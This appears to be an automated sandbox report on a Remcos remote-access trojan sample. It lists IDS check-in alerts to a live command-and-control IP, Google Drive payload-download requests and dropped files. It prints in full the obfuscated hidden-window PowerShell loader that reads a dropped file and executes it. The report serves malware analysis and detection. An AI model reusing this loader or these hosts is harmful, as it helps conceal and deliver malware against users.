            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49704 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49720 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49705 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49650 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49718 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49694 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49633 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49716 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49678 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49644 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49706 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49656 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49662 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49681 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49661 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49719 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49686 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49693 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49712 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49699 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49663 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49708 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49710 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49715 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49691 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49722 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49671 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49713 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49711 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49684 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49685 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49687 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49683 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49680 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49697 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49698 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49723 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49707 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49700 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49690 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49714 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49634 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49637 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49675 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49689 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49721 -> 87.120.116.187:56
            Source: Malware configuration extractorIPs: 87.120.116.187
            Source: global trafficTCP traffic: 192.168.2.5:49440 -> 87.120.116.187:56
            Source: global trafficTCP traffic: 192.168.2.5:49353 -> 1.1.1.1:53
            Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49396 -> 142.250.185.78:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: WtZl31OLfA.exe, WtZl31OLfA.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.2281239821.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: WtZl31OLfA.exe, WtZl31OLfA.exe.1.drString found in binary or memory: http://www.skinstudio.netG
            Source: powershell.exe, 00000001.00000002.2281239821.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000005.00000002.4514868959.0000000020D60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkXr
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/;
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/A
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download(
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=downloadF
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49396
            Source: unknownNetwork traffic detected: HTTP traffic on port 49396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49406
            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.5:49396 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.5:49406 version: TLS 1.2
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052EE

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7060, type: MEMORYSTR

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exeJump to dropped file
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeFile created: C:\Windows\resources\0809\relegationenJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeFile created: C:\Windows\resources\0809\relegationen\ernringseksperternesJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_004070400_2_00407040
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_004068690_2_00406869
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_00404B2B0_2_00404B2B
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
            Source: WtZl31OLfA.exe, 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs WtZl31OLfA.exe
            Source: WtZl31OLfA.exeBinary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs WtZl31OLfA.exe
            Source: WtZl31OLfA.exe.1.drBinary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs WtZl31OLfA.exe
            Source: WtZl31OLfA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@2/3
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045AF
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeFile created: C:\Users\user\AppData\Local\neoimpressionismJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_03
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GC7VQU
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeFile created: C:\Users\user\AppData\Local\Temp\nsh9381.tmpJump to behavior
            Source: WtZl31OLfA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: WtZl31OLfA.exeReversingLabs: Detection: 57%
            Source: WtZl31OLfA.exeVirustotal: Detection: 71%
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeFile read: C:\Users\user\Desktop\WtZl31OLfA.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\WtZl31OLfA.exe "C:\Users\user\Desktop\WtZl31OLfA.exe"
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: kernel.appcore.dllJump to behavior
